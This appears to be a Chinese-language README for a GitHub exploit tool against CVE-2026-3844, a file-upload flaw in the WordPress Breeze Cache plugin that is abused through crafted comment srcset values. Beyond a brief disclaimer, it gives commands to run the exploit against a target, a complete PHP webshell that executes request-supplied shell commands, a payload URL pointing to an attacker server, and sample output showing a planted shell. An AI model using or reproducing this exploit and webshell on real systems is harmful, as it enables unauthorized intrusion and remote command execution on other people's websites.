本工具仅供教育和安全研究目的使用。
未经授权访问计算机系统是违法的。请仅在您拥有或获得明确测试许可的系统上使用本工具。
作者对本软件的任何滥用或造成的损害不承担任何责任。
CVE-2026-3844 是 WordPress 的 Breeze Cache 插件(版本 ≤ 2.4.4)中的一个严重未认证任意文件上传漏洞。该插件未能正确验证评论中的 srcset 参数,允许远程攻击者向服务器上传恶意文件(包括 WebShell)。
该漏洞利用了 Breeze 中的 Gravatar 缓存功能。当发布一条包含特制 srcset 参数(其中包含远程文件 URL)的评论时,Breeze 会下载并将该文件存储在本地:
/wp-content/cache/breeze-extra/gravatars/[random_marker][file_extension]
前提条件:必须在 Breeze 设置中启用“本地托管文件 - Gravatars”选项。
# 克隆仓库
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844
# 安装依赖
pip install pycurl termcolor
python3 CVE-2026-3844.py -u http://target.com
# 仅检查目标是否存在漏洞,不进行利用
python3 CVE-2026-3844.py -u http://target.com --check-only
# 使用自定义 Payload URL
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php
# 将输出保存到文件
python3 CVE-2026-3844.py -u http://target.com -o shells.txt
# 为响应较慢的目标增加超时时间
python3 CVE-2026-3844.py -u http://target.com --timeout 30
创建您自己的 WebShell(shell.php):
<?php
if(isset($_REQUEST['cmd'])) {
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
}
?>
将其托管在可访问的位置,然后使用:
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php
该漏洞利用工具会自动检查上传文件中是否存在验证字符串 4356452d323032362d33383434(十六进制编码的“CVE-2026-3844”),以确认利用成功。
[*] 阶段 1:漏洞评估
[*] 正在检查 Breeze 插件版本...
[+] 目标存在漏洞(Breeze v2.4.4)
[*] 阶段 2:利用
[!] 要求:必须启用“本地托管文件 - Gravatars”
[*] 步骤 1:发送恶意评论...
[+] 评论发布成功
[*] 步骤 2:等待 Breeze 缓存文件...
[*] 步骤 3:检查上传的文件...
[+] 文件位于:http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] 找到验证字符串 - 利用成功!
[✓] 状态:成功
[✓] WebShell URL:http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
CVE-2026-3844/
├── CVE-2026-3844.py # 主漏洞利用脚本
├── README.md # 本文件
└── LICENSE # MIT 许可证
本项目采用 MIT 许可证授权 - 详情请参阅 LICENSE 文件。
如果您觉得此工具实用,请在 GitHub 上给它一个星标 ⭐!
| 参数 | 描述 |
|---|
-u, --url | 目标 URL(必填) |
-p, --payload | 远程 Payload URL |
--timeout | 请求超时时间(秒,默认:15) |
--check-only | 仅检查目标是否存在漏洞 |
-o, --output | 将 Shell URL 保存到文件 |